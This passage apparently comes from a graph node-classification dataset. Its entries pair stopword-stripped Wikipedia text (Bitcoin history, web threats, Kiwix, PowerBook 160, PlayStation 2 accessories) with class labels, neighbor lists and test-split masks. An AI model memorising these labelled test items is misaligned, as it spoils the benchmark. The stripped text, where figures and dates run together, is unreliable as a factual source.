transaction using bitcoin occurred programmer laszlo hanyecz bought two papa john pizzas ₿10,000 blockchain analysts estimate nakamoto mined one million bitcoins disappearing 2010 handed network alert key control code repository gavin andresen andresen later became lead developer bitcoin foundation andresen sought decentralize control left opportunity controversy develop future development path bitcoin contrast perceived authority nakamoto contributions early proof-of-concept transactions first major users bitcoin black markets silk road 30 months existence beginning february 2011 silk road exclusively accepted bitcoins payment transacting 9.9 million bitcoins worth 214 million 2011 price started 0.30 per bitcoin growing 5.27 year price rose 31.50 8 june within month price fell 11.00 next month fell 7.80 another month 4.77 litecoin early bitcoin spin-off altcoin appeared october 2011 many altcoins created since 2012 bitcoin prices started 5.27 growing 13.30 year 9 january price risen 7.38 crashed 49 3.80 next 16 days price rose 16.41 17 august fell 57 7.10 next three days bitcoin foundation founded september 2012 promote bitcoin development uptake 2013 prices started 13.30 rising 770 1 january 2014 march 2013 blockchain temporarily split two independent chains different rules due bug version 0.8 bitcoin software two blockchains operated simultaneously six hours version transaction history moment split normal operation restored majority network downgraded version 0.7 bitcoin software selecting backward compatible version blockchain result blockchain became longest chain could accepted participants regardless bitcoin software version split mt gox exchange briefly halted bitcoin deposits price dropped 23 37 recovering previous level approximately 48 following hours us financial crimes enforcement network fincen established regulatory guidelines decentralized virtual currencies bitcoin classifying american bitcoin miners sell generated bitcoins money service businesses msbs subject registration legal obligations april exchanges bitinstant mt gox experienced processing delays due insufficient capacity resulting bitcoin price dropping 266 76 returning 160 within six hours bitcoin price rose 259 10 april crashed 83 45 next three days 15 may 2013 us authorities seized accounts associated mt gox discovering registered money transmitter fincen us 23 june 2013 us drug enforcement administration listed ₿11.02 seized asset united states department justice seizure notice pursuant 21 u.s.c § 881 marked first time government agency seized bitcoin fbi seized ₿30,000 october 2013 dark web website silk road arrest ross william ulbricht bitcoins sold blind auction united states marshals service venture capital investor tim draper bitcoin price rose 755 19 november crashed 50 378 day 30 november 2013 price reached 1,163 starting long-term crash declining 87 152 january 2015 5 december 2013 people bank china prohibited chinese financial institutions using bitcoins announcement value bitcoins dropped baidu longer accepted bitcoins certain services buying real-world goods virtual currency illegal china since least 2009 2014 prices started 770 fell 314 year july 30 2014 wikimedia foundation started accepting donations bitcoin 2015. prices started 314 rose 434 year 2016 prices rose 998 1 january 2017 prices started 998 2017 rose 13,412.44 1 january 2018 reaching time high 19,783.06 17 december 2017 china banned trading bitcoin first steps taken september 2017 complete ban started 1 february 2018 bitcoin prices fell 9,052 6,914 5 february 2018 percentage bitcoin trading chinese renminbi fell 90 september 2017 less 1 june 2018 throughout rest first half 2018 bitcoin price fluctuated 11,480 5,848 1 july 2018 bitcoin price 6,343 price january 1 2019 3,747 72 2018 81 since all-time high bitcoin prices negatively affected several hacks thefts cryptocurrency exchanges including thefts coincheck january 2018 coinrail bithumb june bancor july first six months 2018 761 million worth cryptocurrencies reported stolen exchanges bitcoin price affected even though cryptocurrencies stolen coinrail bancor investors worried security cryptocurrency exchanges unit account bitcoin system bitcoin ticker symbols used represent bitcoin btc xbt unicode character ₿ small amounts bitcoin used alternative units millibitcoin mbtc satoshi sat named homage bitcoin creator satoshi smallest amount within bitcoin representing bitcoins one hundred millionth bitcoin millibitcoin equals bitcoins one thousandth bitcoin 100,000 satoshis bitcoin blockchain public ledger records bitcoin transactions implemented chain blocks block containing hash previous block genesis block chain network communicating nodes running bitcoin software maintains blockchain transactions form payer x sends bitcoins payee z broadcast network using readily available software applications network nodes validate transactions add copy ledger broadcast ledger additions nodes achieve independent verification chain ownership network node stores copy blockchain every 10 minutes new group accepted transactions called block created added blockchain quickly published nodes without requiring central oversight allows bitcoin software determine particular bitcoin spent needed prevent double-spending conventional ledger records transfers actual bills promissory notes exist apart blockchain place bitcoins said exist form unspent outputs transactions transactions defined using forth-like scripting language transactions consist one inputs one outputs user sends bitcoins user designates address amount bitcoin sent address output prevent double spending input must refer previous unspent output blockchain use multiple inputs corresponds use multiple coins cash transaction since transactions multiple outputs users send bitcoins multiple recipients one transaction cash transaction sum inputs coins used pay exceed intended sum payments case additional output used returning change back payer input satoshis accounted transaction outputs become transaction fee though transaction fees optional miners choose transactions process prioritize pay higher fees miners may choose transactions based fee paid relative storage size absolute amount money paid fee fees generally measured satoshis per byte sat/b size transactions dependent number inputs used create transaction number outputs blockchain bitcoins registered bitcoin addresses creating bitcoin address requires nothing picking random valid private key computing corresponding bitcoin address computation done split second reverse computing private key given bitcoin address mathematically unfeasible users tell others make public bitcoin address without compromising corresponding private key moreover number valid private keys vast extremely unlikely someone compute key-pair already use funds vast number valid private keys makes unfeasible brute force could used compromise private key able spend bitcoins owner must know corresponding private key digitally sign transaction network verifies signature using public key private key never revealed private key lost bitcoin network recognize evidence ownership coins unusable effectively lost example 2013 one user claimed lost 7,500 bitcoins worth 7.5 million time accidentally discarded hard drive containing private key 20 bitcoins believed lost would market value 20 billion july 2018 prices ensure security bitcoins private key must kept secret private key revealed third party e.g data breach third party use steal associated bitcoins around 980,000 bitcoins stolen cryptocurrency exchanges regarding ownership distribution 16 march 2018 0.5 bitcoin wallets 87 bitcoins ever mined mining record-keeping service done use computer processing power miners keep blockchain consistent complete unalterable repeatedly grouping newly broadcast transactions block broadcast network verified recipient nodes block contains sha-256 cryptographic hash previous block thus linking previous block giving blockchain name accepted rest network new block must contain proof-of-work pow system used based adam back 1997 anti-spam scheme hashcash pow requires miners find number called nonce block content hashed along nonce result numerically smaller network difficulty target proof easy node network verify extremely time-consuming generate secure cryptographic hash miners must try many different nonce values usually sequence tested values ascending natural numbers 0 1 2 3 ... meeting difficulty target every 2,016 blocks approximately 14 days roughly 10 min per block difficulty target adjusted based network recent performance aim keeping average time new blocks ten minutes way system automatically adapts total amount mining power network 1 march 2014 1 march 2015 average number nonces miners try creating new block increased 16.4 quintillion 200.5 quintillion proof-of-work system alongside chaining blocks makes modifications blockchain extremely hard attacker must modify subsequent blocks order modifications one block accepted new blocks mined time difficulty modifying block increases time passes number subsequent blocks also called confirmations given block increases successful miner finding new block allowed rest network reward newly created bitcoins transaction fees reward amounted 12.5 newly created bitcoins per block added blockchain plus transaction fees payments processed block claim reward special transaction called coinbase included processed payments bitcoins existence created coinbase transactions bitcoin protocol specifies reward adding block halved every 210,000 blocks approximately every four years eventually reward decrease zero limit 21 million bitcoins reached 2140 record keeping rewarded solely transaction fees words nakamoto set monetary policy based artificial scarcity bitcoin inception total number bitcoins could never exceed 21 million new bitcoins created roughly every ten minutes rate generated drops half every four years circulation computing power often bundled together pooled reduce variance miner income individual mining rigs often wait long periods confirm block transactions receive payment pool participating miners get paid every time participating server solves block payment depends amount work individual miner contributed help find block wallet stores information necessary transact bitcoins wallets often described place hold store bitcoins due nature system bitcoins inseparable blockchain transaction ledger wallet correctly defined something stores digital credentials bitcoin holdings allows one access spend bitcoin uses public-key cryptography two cryptographic keys one public one private generated basic wallet collection keys several modes wallets operate inverse relationship regards trustlessness computational requirements third-party internet services called online wallets offer similar functionality may easier use case credentials access funds stored online wallet provider rather user hardware result user must complete trust online wallet provider malicious provider breach server security may cause entrusted bitcoins stolen example security breach occurred mt gox 2011 physical wallets store credentials necessary spend bitcoins offline simple paper printout private key paper wallet paper wallet created keypair generated computer internet connection private key written printed onto paper erased computer paper wallet stored safe physical location later retrieval bitcoins stored using paper wallet said cold storage 2014 interview quadrigacx founder gerald cotten explained company stored customer funds paper wallets safe deposit boxes send money ’ need go back bank every time want put money send money bitcoin app directly paper wallets keep safe way cameron tyler winklevoss founders gemini trust co. exchange reported cut paper wallets pieces stored envelopes distributed safe deposit boxes across united states system theft one envelope would neither allow thief steal bitcoins deprive rightful owners access physical wallets also take form metal token coins private key accessible security hologram recess struck reverse side security hologram self-destructs removed token showing private key accessed originally tokens struck brass base metals later used precious metals bitcoin grew value popularity coins stored face value high ₿1000 struck gold british museum coin collection includes four specimens earliest series funded bitcoin tokens one currently display museum money gallery 2013 utahn manufacturer tokens ordered financial crimes enforcement network fincen register money services business producing funded bitcoin tokens another type physical wallet called hardware wallet keeps credentials offline facilitating transactions hardware wallet acts computer peripheral signs transactions requested user must press button wallet confirm intended make transaction hardware wallets never expose private keys keeping bitcoins cold storage even used computers may compromised malware first wallet program simply named bitcoin sometimes referred satoshi client released 2009 satoshi nakamoto open-source software version 0.5 client moved wxwidgets user interface toolkit qt whole bundle referred bitcoin-qt release version 0.9 software bundle renamed bitcoin core distinguish underlying network bitcoin core perhaps best known implementation client alternative clients forks bitcoin core exist bitcoin xt bitcoin unlimited parity bitcoin 1 august 2017 hard fork bitcoin created known bitcoin cash bitcoin cash larger block size limit identical blockchain time fork 24 october 2017 another hard fork bitcoin gold created bitcoin gold changes proof-of-work algorithm used mining developers felt mining become specialized bitcoin decentralized researchers pointed trend towards centralization although bitcoin sent directly user user practice intermediaries widely used bitcoin miners join large mining pools minimize variance income transactions network confirmed miners decentralization network requires single miner mining pool obtains 51 hashing power would allow double-spend coins prevent certain transactions verified prevent miners earning income six mining pools controlled 75 overall bitcoin hashing power 2014 mining pool ghash.io obtained 51 hashing power raised significant controversies safety network pool voluntarily capped hashing power 39.99 requested pools act responsibly benefit whole network 70 hashing power 90 transactions operating china according researchers parts ecosystem also controlled small set entities notably maintenance client software online wallets simplified payment verification spv clients bitcoin pseudonymous meaning funds tied real-world entities rather bitcoin addresses owners bitcoin addresses explicitly identified transactions blockchain public addition transactions linked individuals companies idioms use e.g. transactions spend coins multiple inputs indicate inputs may common owner corroborating public transaction data known information owners certain addresses additionally bitcoin exchanges bitcoins traded traditional currencies may required law collect personal information heighten financial privacy new bitcoin address generated transaction wallets similar software technically handle bitcoins equivalent establishing basic level fungibility researchers pointed history bitcoin registered publicly available blockchain ledger users may refuse accept bitcoins coming controversial transactions would harm bitcoin fungibility example 2012 mt gox froze accounts users deposited bitcoins known stolen blocks blockchain originally limited 32 megabytes size block size limit one megabyte introduced satoshi nakamoto 2010 eventually block size limit one megabyte created problems transaction processing increasing transaction fees delayed processing transactions satoshi nakamoto stated white paper root problem conventional currencies trust required make work central bank must trusted debase currency history fiat currencies full breaches trust according european central bank decentralization money offered bitcoin theoretical roots austrian school economics especially friedrich von hayek book denationalisation money argument refined hayek advocates complete free market production distribution management money end monopoly central banks according new york times libertarians anarchists attracted idea early bitcoin supporter roger ver said first almost everyone got involved philosophical reasons saw bitcoin great idea way separate money state economist describes bitcoin techno-anarchist project create online version cash way people transact without possibility interference malicious governments banks david golumbia says ideas influencing bitcoin advocates emerge right-wing extremist movements liberty lobby john birch society anti-central bank rhetoric recently ron paul tea party-style libertarianism steve bannon owns good stake bitcoin considers disruptive populism takes control back central authorities revolutionary however researchers looking uncover reasons interest bitcoin find evidence google search data linked libertarianism bitcoin digital asset designed work peer-to-peer transactions currency bitcoins three qualities useful currency according economist january 2015 hard earn limited supply easy verify per researchers bitcoin functions payment system currency economists define money store value medium exchange unit account according economist 2014 bitcoin functions best medium exchange however debated 2018 assessment economist stated cryptocurrencies met none three criteria according research cambridge university 2.9 million 5.8 million unique users used cryptocurrency wallet 2017 bitcoin number users grown significantly since 2013 300,000–1.3 million users addition characterized cryptocurrency bitcoin also characterized payment system overwhelming majority bitcoin transactions take place cryptocurrency exchange rather used transactions merchants delays processing payments blockchain ten minutes make bitcoin use difficult retail setting prices usually quoted units bitcoin many trades involve one sometimes two conversions conventional currencies merchants accept bitcoin payments may use payment service providers perform conversions 2017 2018 bitcoin acceptance among major online retailers included three top 500 u.s. online merchants five 2016 reasons decline include high transaction fees due bitcoin scalability issues long transaction times bloomberg reported largest 17 crypto merchant-processing services handled 69 million june 2018 411 million september 2017 bitcoin actually usable retail transactions high costs inability process chargebacks according nicholas weaver researcher quoted bloomberg high price volatility transaction fees make paying small retail purchases bitcoin impractical according economist kim grauer however bitcoin continues used large-item purchases sites overstock.com cross-border payments freelancers vendors bitcoins bought digital currency exchanges per researchers little sign bitcoin use international remittances despite high fees charged banks western union compete market south china morning post however mentions use bitcoin hong kong workers transfer money home 2014 national australia bank closed accounts businesses ties bitcoin hsbc refused serve hedge fund links bitcoin australian banks general reported closing bank accounts operators businesses involving currency 10 december 2017 chicago board options exchange started trading bitcoin futures followed chicago mercantile exchange started trading bitcoin futures 17 december 2017 winklevoss twins purchased bitcoin 2013 washington post reported claim owned 1 bitcoins existence time methods investment bitcoin funds first regulated bitcoin fund established jersey july 2014 approved jersey financial services commission forbes named bitcoin best investment 2013 2014 bloomberg named bitcoin one worst investments year 2015 bitcoin topped bloomberg currency tables according bitinfocharts.com 2017 9,272 bitcoin wallets 1 million worth bitcoins exact number bitcoin millionaires uncertain single person one bitcoin wallet venture capitalists peter thiel founders fund invested million bitpay purchase bitcoins instead fund bitcoin infrastructure provides payment systems merchants exchanges wallet services etc 2012 incubator bitcoin-focused start-ups founded adam draper financing help father venture capitalist tim draper one largest bitcoin holders winning auction 30,000 bitcoins time called mystery buyer company goal fund 100 bitcoin businesses within 2–3 years 10,000 20,000 6 stake investors also invest bitcoin mining according 2015 study paolo tasca bitcoin startups raised almost 1 billion three years q1 2012 – q1 2015 price bitcoins gone cycles appreciation depreciation referred bubbles busts 2011 value one bitcoin rapidly rose us 0.30 us 32 returning us 2 latter half 2012 2012–13 cypriot financial crisis bitcoin price began rise reaching high us 266 10 april 2013 crashing around us 50 29 november 2013 cost one bitcoin rose peak us 1,242 2014 price fell sharply april remained depressed little half 2013 prices us 600 time bitcoin developers gavin andresen mike hearn warned bubbles may occur according mark t. williams bitcoin volatility seven times greater gold eight times greater p 500 18 times greater us dollar bitcoin decentralized nature trading online exchanges located many countries regulation bitcoin difficult however use bitcoin criminalized shutting exchanges peer-to-peer economy given country would constitute de facto ban legal status bitcoin varies substantially country country still undefined changing many regulations bans apply bitcoin probably extend similar cryptocurrency systems according library congress absolute ban trading using cryptocurrencies applies eight countries algeria bolivia egypt iraq morocco nepal pakistan united arab emirates implicit ban applies another 15 countries include bahrain bangladesh china colombia dominican republic indonesia iran kuwait lesotho lithuania macau oman qatar saudi arabia taiwan u.s. commodity futures trading commission issued four customer advisories bitcoin related investments july 2018 warning emphasized trading cryptocurrency often speculative risk theft hacking fraud december 2017 advisory warned virtual currencies risky u.s. securities exchange commission also issued warnings may 2014 investor alert warned investments involving bitcoin might high rates fraud investors might solicited social media sites earlier investor alert warned use bitcoin ponzi schemes european banking authority issued warning 2013 focusing lack regulation bitcoin chance exchanges would hacked volatility bitcoin price general fraud self-regulatory organization finra north american securities administrators association issued investor alerts bitcoin official investigation bitcoin traders reported may 2018 u.s. justice department launched investigation possible price manipulation including techniques spoofing wash trades traders u.s. u.k south korea possibly countries investigated brett redfearn head u.s. securities exchange commission division trading markets identified several manipulation techniques concern march 2018 u.s. federal investigation prompted concerns possible manipulation futures settlement dates final settlement price cme bitcoin futures determined prices four exchanges bitstamp coinbase itbit kraken following first delivery date january 2018 cme requested extensive detailed trading information several exchanges refused provide later provided limited data commodity futures trading commission subpoenaed data exchanges state provincial securities regulators coordinated north american securities administrators association investigating bitcoin scams icos 40 jurisdictions academic research published journal monetary economics concluded price manipulation occurred mt gox bitcoin theft market remains vulnerable manipulation history hacks fraud theft involving bitcoin dates back least 2011 research john m. griffin amin shams 2018 suggests trading associated increases amount tether cryptocurrency associated trading bitfinex exchange account half price increase bitcoin late 2017 j.l van der velde ceo bitfinex tether denied claims price manipulation bitfinex tether ever engaged sort market price manipulation tether issuances used prop price bitcoin coin/token bitfinex bank international settlements summarized several criticisms bitcoin chapter v 2018 annual report criticisms include lack stability bitcoin price high energy consumption high variable transactions costs poor security fraud cryptocurrency exchanges vulnerability debasement forking influence miners economist wrote 2015 criticisms unfair predominantly shady image may compel users overlook capabilities blockchain technology also due fact volatility bitcoin changing time bitcoin along cryptocurrencies described economic bubble least eight nobel memorial prize economic sciences laureates including robert shiller joseph stiglitz richard thaler noted keynesian economist paul krugman wrote new york times column criticizing bitcoin calling bubble fraud professor nouriel roubini new york university called bitcoin mother bubbles central bankers including former federal reserve chairman alan greenspan investors warren buffett george soros stated similar views business executives jamie dimon jack bitcoin criticized amount electricity consumed mining economist estimated even miners used modern facilities combined electricity consumption would 166.7 megawatts 1.46 terawatt-hours per year end 2017 global bitcoin mining activity estimated consume one four gigawatts electricity politico noted even high-end estimates bitcoin total consumption levels amount 6 total power consumed global banking sector even bitcoin consumption levels increased 100 fold today levels bitcoin consumption would still amount 2 global power consumption lower costs bitcoin miners set places like iceland geothermal energy cheap cooling arctic air free bitcoin miners known use hydroelectric power tibet quebec washington state austria reduce electricity costs miners attracted suppliers hydro quebec energy surpluses according university cambridge study much bitcoin mining done china electricity subsidized government various journalists economists central bank estonia voiced concerns bitcoin ponzi scheme april 2013 eric posner law professor university chicago stated real ponzi scheme takes fraud bitcoin contrast seems like collective delusion july 2014 report world bank concluded bitcoin deliberate ponzi scheme june 2014 swiss federal council examined concerns bitcoin might pyramid scheme concluded since case bitcoin typical promises profits lacking assumed bitcoin pyramid scheme july 2017 billionaire howard marks referred bitcoin pyramid scheme bitcoin vulnerable theft phishing scamming hacking around 980,000 bitcoins stolen cryptocurrency exchanges use bitcoin criminals attracted attention financial regulators legislative bodies law enforcement media united states fbi prepared intelligence assessment sec issued pointed warning investment schemes using virtual currencies u.s. senate held hearing virtual currencies november 2013 u.s. government claimed bitcoin used facilitate payments related russian interference 2016 united states elections several news outlets asserted popularity bitcoins hinges ability use purchase illegal goods nobel-prize winning economist joseph stiglitz says bitcoin anonymity encourages money laundering crimes open hole like bitcoin nefarious activity go hole government allow also said regulate could n't engage money laundering crimes demand bitcoin regulating abuses going regulate existence exists abuses 2014 researchers university kentucky found robust evidence computer programming enthusiasts illegal activity drive interest bitcoin find limited support political investment motives australian researchers estimated 25 bitcoin users 44 bitcoin transactions associated illegal activity estimated 24 million bitcoin users primarily using bitcoin illegal activity held 8 billion worth bitcoin made 36 million transactions valued 72 billion charles stross 2013 science fiction novel neptune brood universal interstellar payment system known bitcoin operates using cryptography stross later blogged reference intentional saying wrote neptune brood 2011 bitcoin obscure back figured enough name recognition useful term interstellar currency 'd clue people networked digital currency 2014 documentary rise rise bitcoin portrays diversity motives behind use bitcoin interviewing people use include computer programmer drug dealer 2016 documentary banking bitcoin introduction beginnings bitcoin ideas behind cryptocurrency today september 2015 establishment peer-reviewed academic journal ledger announced covers studies cryptocurrencies related technologies published university pittsburgh journal encourages authors digitally sign file hash submitted papers timestamped bitcoin blockchain authors also asked include personal bitcoin address first page papers",
    "neighbors": [
      3713,
      8574,
      8706,
      8068,
      1925,
      9859,
      8331,
      3982,
      4624,
      1683,
      4883,
      535,
      9240,
      10522,
      1435,
      9375,
      5024,
      9248,
      10658,
      11684,
      10154,
      7085,
      3886,
      1970,
      10110,
      3508,
      8244,
      4280,
      3642,
      10875,
      574,
      1087,
      3904,
      833,
      5438,
      8514,
      708,
      5956,
      1222,
      5830,
      6728,
      8640,
      9548,
      7885,
      78,
      9550,
      6993,
      7633,
      4435,
      8916,
      11221,
      11349,
      857,
      4827,
      4956,
      11612,
      3807,
      9695,
      8674,
      1251,
      2409,
      9664,
      1776,
      8176,
      1908,
      6905,
      4475,
      764,
      6141,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1088,
    "label": 4,
    "text": "Web_threat:web threat web threat threat uses world wide web facilitate cybercrime web threats use multiple types malware fraud utilize http https protocols may also employ protocols components links email im malware attachments servers access web benefit cybercriminals stealing information subsequent sale help absorb infected pcs botnets web threats pose broad range risks including financial damages identity theft loss confidential information/data theft network resources damaged brand/personal reputation erosion consumer confidence e-commerce online banking type threat related information technology risk i.e risk affecting gained increasing impact society due spread processes web threats divided two primary categories based delivery method – push pull push-based threats use spam phishing fraudulent means lure user malicious often spoofed website collects information and/or injects malware push attacks use phishing dns poisoning pharming means appear originate trusted source precisely-targeted push-based web threats often referred spear phishing reflect focus data gathering attack spear phishing typically targets specific individuals groups financial gain push-based web threats malware authors use social engineering enticing subject lines reference holidays popular personalities sports pornography world events hot topics persuade recipients open email follow links malicious websites open attachments malware accesses web pull-based web threats often referred “ drive-by ” threats experts commonly “ drive-by downloads ” journalists general public since affect website visitor cybercriminals infect legitimate websites unknowingly transmit malware visitors alter search results take users malicious websites upon loading page user ’ browser passively runs malware downloader hidden html frame iframe without user interaction giorgio maone wrote 2008 today ’ malware runs mostly runs windows ’ commonest executable platform tomorrow ’ likely run web reason like web already huge executable platform start thinking way security perspective growth web threats result popularity web – relatively unprotected widely consistently used medium crucial business productivity online banking e-commerce well everyday lives people worldwide appeal web 2.0 applications websites increases vulnerability web web 2.0 applications make use ajax group web development programming tools used creating interactive web applications rich internet applications users benefit greater interactivity dynamic websites also exposed greater security risks inherent browser client processing september 2008 malicious hackers broke several sections businessweek.com redirect visitors malware-hosting websites hundreds pages compromised malicious javascript pointing third-party servers august 2008 popular social networking sites hit worm using social engineering techniques get users install piece malware worm installs comments sites links fake site users follow link told need update flash player installer installs malware rather flash player malware downloads rogue anti-spyware application antispy spider may 2008 websites worldwide compromised malicious javascript initially half million websites worldwide infected sql injection leveraged zlob variant downloaded additional trojan onto users ’ pcs websites china taiwan singapore compromised followed shortly thereafter humanitarian government news sites uk israel asia attack compromised websites led variety redirects download trojan september 2017 visitors tv network showtime website found website included coinhive code automatically began mining monero cryptocurrency without user consent coinhive software throttled use twenty percent visiting computer cpu avoid detection shortly discovery publicized social media coinhive code removed showtime declined comment multiple news articles unknown showtime inserted code website intentionally addition cryptomining code result website compromise coinhive offers code websites requires user consent prior execution less 2 percent coinhive implementations use code german researchers defined cryptojacking websites executing cryptomining visiting users computers without prior consent 1 every five hundred websites hosting cryptomining script cryptojacking persistent web threat conventional approaches failed fully protect consumers businesses web threats viable approach implement multi-layered protection—protection cloud internet gateway across network servers client web threat solution",
    "neighbors": [
      3072,
      6786,
      899,
      5636,
      5764,
      7044,
      9591,
      10245,
      10756,
      9227,
      9356,
      9102,
      7441,
      8978,
      4863,
      4883,
      4245,
      278,
      9233,
      10392,
      1690,
      3867,
      9242,
      10141,
      5281,
      9761,
      10915,
      2213,
      8998,
      9256,
      939,
      300,
      9727,
      9771,
      1970,
      4023,
      10297,
      3643,
      6588,
      7739,
      9791,
      3395,
      8387,
      4165,
      11594,
      6347,
      2508,
      4945,
      3032,
      1369,
      3673,
      4314,
      7515,
      9181,
      9688,
      3552,
      4344,
      3555,
      612,
      3941,
      9187,
      11621,
      2409,
      107,
      877,
      1776,
      119,
      3320,
      2041,
      5245,
      1279
    ],
    "mask": "None"
  },
  {
    "node_id": 1089,
    "label": 8,
    "text": "Kiwix:kiwix kiwix free open-source offline web browser created emmanuel engelhart renaud gaudin 2007 first launched allow offline access wikipedia since expanded include projects wikimedia foundation well public domain texts project gutenberg available 100 languages kiwix included several high-profile projects smuggling operations north korea encyclopedic access cuba google impact challenge recipient bibliothèques sans frontières founder emmanuel engelhart sees wikipedia common good saying contents wikipedia available everyone even without internet access launched kiwix project becoming wikipedia editor 2004 emmanuel engelhart became interested developing offline versions wikipedia initiated 2003 trigger project 2012 kiwix grant wikimedia france build kiwix-plug deployed universities eleven countries known afripedia project february 2013 kiwix sourceforge project month award open source award 2015 software designed offline reader web content used computers without internet connection computers slow expensive connection avoid censorship also used traveling e.g plane train users first download kiwix download content offline viewing kiwix compression saves disk space bandwidth english-language wikipedia pictures fits usb stick 54 gb may 2016 16 gb pictures content files compressed zim format makes smaller leaves easy index search selectively decompress zim files opened kiwix looks behaves like web browser kiwix offers full text search tabbed navigation option export articles pdf html http server version called kiwix-serve allows computer host kiwix content make available computers network computers see ordinary website kiwix-plug http server version plug computers often used provide wi-fi server kiwix uses deprecated xulrunner mozilla application framework localised translatewiki.net plans replace list content available kiwix available download including language-specific sublists content loaded kiwix since 2014 wikipedia versions available download various different languages english wikipedia full version containing pictures well alternative version containing text downloaded archive servers updated every two ten months depending size file english wikipedia update frequency thus substantially lower bzip2 database downloads wikimedia foundation besides wikipedia content wikimedia foundation wikisource wikiquote wikivoyage wikibooks wikiversity also available offline viewing various different languages november 2014 zim version open texts forming part project gutenberg made available besides public domain content works licensed creative commons license available download well example offline versions ubuntu wiki containing user documentation ubuntu operating system zim editions ted conference talks videos crash course available kiwix archive zim file formats kiwix installed desktop computer stand-alone program installed tablet smartphone create wlan environment raspberry plug software development project kiwix directly involved deployment projects however third party organisations use software component projects examples include kiwix formerly available native package managers linux distributions however kiwix currently available package databases due xulrunner program kiwix depends deprecated mozilla removed package databases kiwix available sugar archlinux linux distributions also available android kiwix available microsoft store google play apple ios app store since 2015 series customized apps also released medical wikipedia phet simulations two largest",
    "neighbors": [
      225,
      1089,
      5343,
      934,
      9063,
      3881,
      5067,
      237,
      7983,
      8627,
      10900,
      823,
      1849,
      6618,
      1083,
      8413,
      3743
    ],
    "mask": "Test"
  },
  {
    "node_id": 1090,
    "label": 3,
    "text": "PowerBook_160:powerbook 160 powerbook 160 portable computer released apple computer along powerbook 145 powerbook 180 october 1992 time constituted mid-range model replacing previous powerbook 140 processing power powerbook 160 sold may 1994 case design powerbook 180 shipped less powerful 25 mhz motorola 68030 cpu fpu identically low-end 145 however powerbook 160 came diagonal passive matrix lcd screen first time capable displaying 4-bit grayscale 160 180 first powerbooks add external color video port like macintosh portable well increasing maximum ram 14 mb powerbooks introduced new power saving feature allowed processors run slower 16 mhz rate speed original 140 powerbook 160 40mb scsi hard disk drive configurable 80 120mb 165 added 33 mhz processor larger standard hard drive along powerbook 145b would last true 100 series powerbooks last apple laptop include two serial printer modem ports entry level descendant powerbook 150 would continue sell another year though used 140 case design internals actually based powerbook duo powerbook 190 100-series powerbook name used powerbook 5300 motherboard case well 165c pictured identical 165 except included 68882 fpu passive matrix color lcd capable displaying 256 colors apple first powerbook color display result thicker color display exterior case lid redesigned closely resembling used powerbook duo series powerbook 180c used case modification",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      4180,
      10838,
      10840,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      7299,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      8109,
      1461,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      10224,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 1091,
    "label": 3,
    "text": "PlayStation_2_accessories:playstation 2 accessories various accessories playstation 2 video game console produced sony well third parties include controllers audio video input devices like microphones video cameras cables better sound picture quality dualshock 2 analog controller scph-10010 standard controller playstation 2 almost identical original dualshock controller original playstation console minor changes buttons l3 r3 analog feature analog pressure sensitivity connecting cable slightly longer original dualshock black rather grey connector squarer dualshock 2 printed top controller features two levels vibration feedback logitech cordless action controller officially licensed wireless controller playstation 2 made logitech features inputs found standard dualshock 2 controller i.e ten analog pressure-sensitive buttons l1 r1 l2 r2 start select three digital button l3 r3 analog mode button two analog sticks buttons pressure-sensitive controller compatible games require dualshock 2 controller also features two vibration motors haptic feedback compatible dualshock/dualshock 2 enabled games power saving measure vibration may turned user way button controller face powered two aa batteries communicates console using proprietary 2.4 ghz rf protocol wireless way dongle connects ps2 controller port similar manner nintendo wavebird wireless controller like logitech cordless action controller logitech cordless controller officially licensed wireless playstation 2 controller made logitech features buttons including analog functionality standard dualshock 2 controller compatible games requiring dualshock 2 powered two aa batteries power-saving measure vibration function turned communicates console via wireless dongle connects ps2 controller port uses proprietary 2.4 ghz rf technology sega saturn ps2 controller controller ps2 based around sega saturn type-2/japanese style controller controller officially licensed sony sega first version released black exclusively japan 2005 second version produced color purple part joint venture sega capcom coincide launch vampire darkstalkers collection japan connector almost identical original saturn controller minor changes place original saturn start button indented playstation style start select buttons additionally reset stop play/pause rewind fast-forward labels x z l r buttons removed labels corresponding playstation buttons added listed http //uk.playstation.com/ps2/peripherals/detail/item285752/driving-force e2 84 a2-gt/ various microphones available use playstation 2 rhythm games sony singstar karaoke games harmonix rock band series singstar microphones available wired wireless varieties connect console via usb certain ps2 games dance pad compatible allows player follow alongside game actions player must perform usually found games dance revolution games buzz buzzers special controllers designed specifically buzz quiz game series controllers feature large red buzzer buttons four smaller coloured buttons answer selection wired wireless versions available come bundled buzz games four-buzzer set acts single usb device connects usb port playstation 2 wireless versions connect via usb dongle dongle able support 4 wireless buzzers time second dongle required additional buzzers 8 player games wired wireless versions buzzers compatible playstation 2 playstation 3 big button controllers available xbox 360 heavily resemble buzzers many respects fulfil function dvd remote control infra-red remote control playstation 2 designed allow easier control dvd movies first remote scph-10150 came bundled scph-10170 infra-red receiver dongle scph-10160 attached one playstation 2 controller ports dongle needed later ps2 models beginning scph-500xx slimline ps2 models scph-700xx scph-900xx feature integrated ir port two different models dvd remote control released minor differences first released scph-10150 second scph-10420 functionally visually identical apart addition eject reset/power buttons however eject button work ps2 models scph-100xx -500xx slimline playstation 2 models motorized disc tray eject versions remote feature standard ps2 buttons addition dvd playback controls various a/v cables made available playstation 2 offer varying levels picture quality additionally ps2 features toslink port facilitates output digital s/pdif audio 2-channel lpcm 5.1-channel dolby digital 5.1-channel dts latter two available dvd playback encoded disk ps2 compatible playstation playstation 3 cables use av-multi port rfu adapter scph-1122 rf modulator cable carries mono audio video 576i/50 hz pal 480i/60 hz ntsc via rf signal connects using tv aerial plug similar rfu adapter cable available playstation av cable 